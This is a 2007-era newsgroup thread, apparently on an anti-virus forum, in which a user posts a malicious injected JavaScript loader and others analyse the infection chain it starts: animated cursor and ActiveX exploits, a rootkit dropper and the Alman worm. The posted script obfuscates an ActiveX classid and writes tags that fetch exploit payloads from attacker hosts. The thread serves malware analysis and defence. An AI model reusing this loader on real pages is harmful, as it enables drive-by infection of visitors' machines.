Sunry

What virus it could be?

While I browser any web page, from the html source I found some
unusual stuff:
<SCRIPT LANGUAGE="javascript1.2" SRC="http://ads.goodnetads.org/
main.js"></SCRIPT>

From whois, the domain name just created recently:
-------------------------------------------------------------------------------------
Domain ID149809477-LROR
Domain Name:GOODNETADS.ORG
Created On:15-Nov-2007 07:11:35 UTC
Last Updated On:15-Nov-2007 07:11:37 UTC
Expiration Date:15-Nov-2008 07:11:35 UTC
Sponsoring Registrar:eNom, Inc. (R39-LROR)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:BE872B07E523EDFE
Registrant Name:wang ming
Registrant Organization:wang ming
Registrant Street1:cccccccc
Registrant Street2:
Registrant Street3:
Registrant City:ccccc
Registrant State/Province:Xizang
Registrant Postal Code:100000
Registrant Country:CN
Registrant Phone:+10.2312312312
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:web@goodnetads.org
Admin ID:BE872B07E523EDFE
Admin Name:wang ming
Admin Organization:wang ming
Admin Street1:cccccccc
Admin Street2:
Admin Street3:
Admin City:ccccc
Admin State/Province:Xizang
Admin Postal Code:100000
Admin Country:CN
Admin Phone:+10.2312312312
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:web@goodnetads.org
Tech ID:BE872B07E523EDFE
Tech Name:wang ming
Tech Organization:wang ming
Tech Street1:cccccccc
Tech Street2:
Tech Street3:
Tech City:ccccc
Tech State/Province:Xizang
Tech Postal Code:100000
Tech Country:CN
Tech Phone:+10.2312312312
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:web@goodnetads.org
Name ServerNS1.NAME-SERVICES.COM
Name ServerNS2.NAME-SERVICES.COM
Name ServerNS3.NAME-SERVICES.COM
Name ServerNS4.NAME-SERVICES.COM
Name ServerNS5.NAME-SERVICES.COM
-------------------------------------------------------------------------------------


and the script code is:
-------------------------------------------------------------------------------------
window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("Lovemm=");
if (start != -1)
{}
else
{
var expires = new Date();
expires.setTime(expires.getTime() + 24 * 1 * 60 * 60 * 1000);
document.cookie = "Lovemm=funnyfunny;expires=" +
expires.toGMTString();
try{
var downf = document.createElement("object");
downf.setAttribute("classid",
"clsid:B"+"D9"+"6C"+"556-6"+"5A3-11D"+"0-98"+"3A-00C"+"04FC2"+"9E"+"36");
str="Microsoft.XMLHTTP";
var ab=ab;
var O = downf.CreateObject(str,"");
document.write('<SCRI' + 'PT LANGUAGE="javascript1.2"');
document.write(' SRC="http://ads.1234214.info/tk.js"></SCR' +
'IPT>');
}
catch(e)
{
document.write('<SCRI' + 'PT LANGUAGE="javascript1.2"');
document.write(' SRC="http://down.goodnetads.org/tk/xl.js"></SCR' +
'IPT>');
document.write("<DIV style=\"CURSOR: url('http://ads.1234214.info/tk/
ani.c')\"></DIV>");
};
}
-------------------------------------------------------------------------------------

Obviously it's some kind of ads virus, the virus might not on my box,
I checked. And there's no arp spoofing.
I also checked other computers in the same LAN, they also have the
same problem with me.
I handled it with hosts files that direct it to myself.

How could this kind of virus get to work like this way?

Ant

"Sunry" wrote:

> While I browser any web page, from the html source I found some
> unusual stuff:

> ads.goodnetads.org/main.js

loads:

> ads.1234214.info/tk.js

which will attempt to download and run "info.jpg.exe".

main.js also loads:

> down.goodnetads.org/tk/xl.js

which looks like a malformed FlvPlayerUrl (Flash video?) exploit using
a buffer overflow to inject code. It's not obvious what the code does.

main.js also loads:

> ads.1234214.info/tk/ani.c

which is an animated cursor exploit to download and run "info.exe".
This file is identical to "info.jpg.exe".

> Obviously it's some kind of ads virus, the virus might not on my box,
> I checked. And there's no arp spoofing.

It's nasty malware incorporating root-kit techniques. It will hide or
protect its files. The downloader (info.exe or info.jpg.exe) performs
the following actions:

* creates <windows>\system32\drivers\uuid.sys
* calls ZwSetSystemInformation to load uuid.sys into kernel space
* deletes uuid.sys
* downloads and runs "ads.1234214.info/tk/web.jpg", another executable
as <user>\Local Settings\Temp\update.exe
* deletes the original downloader.

I haven't analysed what update.exe (web.jpg) does but it's detected by
Bitdefender as Win32.Almanahe.E. A quick inspection of the binary
shows it to be similar to what they describe here in the 'D' variant:
http://www.bitdefender.com/VIRUS-100...lmanahe.D.html

> I also checked other computers in the same LAN, they also have the
> same problem with me.
> I handled it with hosts files that direct it to myself.

You'd better check what other sites your network is connecting to.

> How could this kind of virus get to work like this way?

Malicious Javascript taking advantage of unpatched vulnerabilities in
Windows and other components. You need to increase your browser and
system security, and certainly should not allow ActiveX controls and
plugins to run on untrusted sites such as these.

Virus Guy

Ant wrote:

> main.js also loads:
>
> > ads.1234214.info/tk/ani.c
>
> which is an animated cursor exploit to download and run
> "info.exe".

info.exe makes references to:

\system32\drivers\uuid.sys and UNIS.bat

Absolutely no search hits for uuid.sys.

info.exe was already analyzed by VT, with a 78% detection rate:

http://www.virustotal.com/resultado....a2edd0076c312b

Microsoft being the only notable AV program to NOT detect it.

ani.c has an 84% detection rate.

The file tk.js is flagged only by 6 out of 32 AV programs as a JS
trojan downloader (bdx, hi, ha or ldc).

> I haven't analysed what update.exe (web.jpg) does but it's
> detected by Bitdefender as Win32.Almanahe.E.

It's also detected as Alman.a by most AV.

According to this:

http://www.f-secure.com/v-descs/virus_w32_alman_a.shtml

it spreads via network connectivity, and also infects all executable
files on a system (so there should be lots of hard-drive activity I
would think).

It seems to be catagorized as a network worm and trojan, not as a
rootkit - but perhaps it eventually downloads and installs a rootkit
as a second stage of the infection.

> > I also checked other computers in the same LAN, they also
> > have the same problem with me. I handled it with hosts
> > files that direct it to myself.

Read the above f-secure link. It contains advice and links to
disinfection tools.

> > How could this kind of virus get to work like this way?

There is some aspect of your system that wasn't patched. If you're
sure that it's up to date (as far as Microsoft is concerned) then your
Java JRE should be looked at. You need to uninstall ALL versions of
Java Runtime Engines (JRE) and only install the latest version.

It's a widely known flaw that simply having an old version of JRE
still installed on your system is a vulnerability. Installing new
versions of JRE does not get rid of older versions.

Have you "innoculated" your browsers with Spybot SD and Spyware
Blaster?

Ant

"Virus Guy" wrote:

> Absolutely no search hits for uuid.sys.

Not surprising because that is deleted immediately after being dropped
and loaded into memory. It's the initial rootkit component and is
likely not needed once the second binary is downloaded and installed.

> http://www.f-secure.com/v-descs/virus_w32_alman_a.shtml

That's an older version which behaves in a similar way. The
Bitdefender example is a closer description and has the correct URL
which the malware uses for further communication.

> It seems to be catagorized as a network worm and trojan, not as a
> rootkit - but perhaps it eventually downloads and installs a rootkit
> as a second stage of the infection.

It drops its own version of linkinfo.dll in the %windows% directory;
the genuine MS version being in %windows%\system32. I believe the
rootkit components are embedded in the dll. They appear to be:

IsDrv122.sys
RsBoot.sys
cdralw.sys

One or more will be launched from the registry entry:
HKLM\SYSTEM\CurrentControlSet\Services
with the service name DLANX.

These files are also created:

C:\setup.exe
\\.\DLUProc

Mutex names appear to be:

__DLU_INF__
PNP#DMUTEX#1#DLU
PNP#NETMUTEX#1#DLU

> There is some aspect of your system that wasn't patched.

I reckon ActiveX, anifile or Macromedia Flash.

> If you're sure that it's up to date (as far as Microsoft is
> concerned) then your Java JRE should be looked at.

In this case, Java had wasn't involved.

jen

"Ant" <not@home.today> wrote in message
news:96CdndrY9NJZstvaRVnyggA@brightview.co.uk...
> "Virus Guy" wrote:
>> Absolutely no search hits for uuid.sys.
> Not surprising because that is deleted immediately after being dropped
> and loaded into memory. It's the initial rootkit component and is
> likely not needed once the second binary is downloaded and installed.
>> http://www.f-secure.com/v-descs/virus_w32_alman_a.shtml
> That's an older version which behaves in a similar way. The
> Bitdefender example is a closer description and has the correct URL
> which the malware uses for further communication.
>> It seems to be catagorized as a network worm and trojan, not as a
>> rootkit - but perhaps it eventually downloads and installs a rootkit
>> as a second stage of the infection.
> It drops its own version of linkinfo.dll in the %windows% directory;
> the genuine MS version being in %windows%\system32. I believe the
> rootkit components are embedded in the dll. They appear to be:
> IsDrv122.sys
> RsBoot.sys
> cdralw.sys
> One or more will be launched from the registry entry:
> HKLM\SYSTEM\CurrentControlSet\Services
> with the service name DLANX.
> These files are also created:
> C:\setup.exe
> \\.\DLUProc
> Mutex names appear to be:
> __DLU_INF__
> PNP#DMUTEX#1#DLU
> PNP#NETMUTEX#1#DLU
>> There is some aspect of your system that wasn't patched.
> I reckon ActiveX, anifile or Macromedia Flash.
>> If you're sure that it's up to date (as far as Microsoft is
>> concerned) then your Java JRE should be looked at.
> In this case, Java had wasn't involved.

I so enjoy your analyses of malware

-jen

Ant

"jen" wrote:

> I so enjoy your analyses of malware

Well, I like pulling them apart but it's nice to know someone is
interested in seeing the results!

Dustin Cook

"Ant" <not@home.today> wrote in
news:fJWdna9mFI8GxdranZ2dnUVZ8vidnZ2d@brightview.c o.uk:

> "jen" wrote:
>
>> I so enjoy your analyses of malware
>
> Well, I like pulling them apart but it's nice to know someone is
> interested in seeing the results!
>
>
>

Several of us are evidently.


--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt

kurt wismer

Virus Guy wrote:
[snip]
> According to this:
>
> http://www.f-secure.com/v-descs/virus_w32_alman_a.shtml
>
> it spreads via network connectivity, and also infects all executable
> files on a system (so there should be lots of hard-drive activity I
> would think).
>
> It seems to be catagorized as a network worm and trojan, not as a
> rootkit - but perhaps it eventually downloads and installs a rootkit
> as a second stage of the infection.

or perhaps 'rootkit' functionality is merely a *property* of other
malware... i think it only gets used as a primary classification when
the malware's other functionality isn't particularly significant by
comparison or if there isn't any other functionality to begin with...

--
"it's not the right time to be sober
now the idiots have taken over
spreading like a social cancer,
is there an answer?"

Buffalo

"Ant" <not@home.today> wrote in message
news:fJWdna9mFI8GxdranZ2dnUVZ8vidnZ2d@brightview.c o.uk...
> "jen" wrote:
>
> > I so enjoy your analyses of malware
>
> Well, I like pulling them apart but it's nice to know someone is
> interested in seeing the results!

Me to.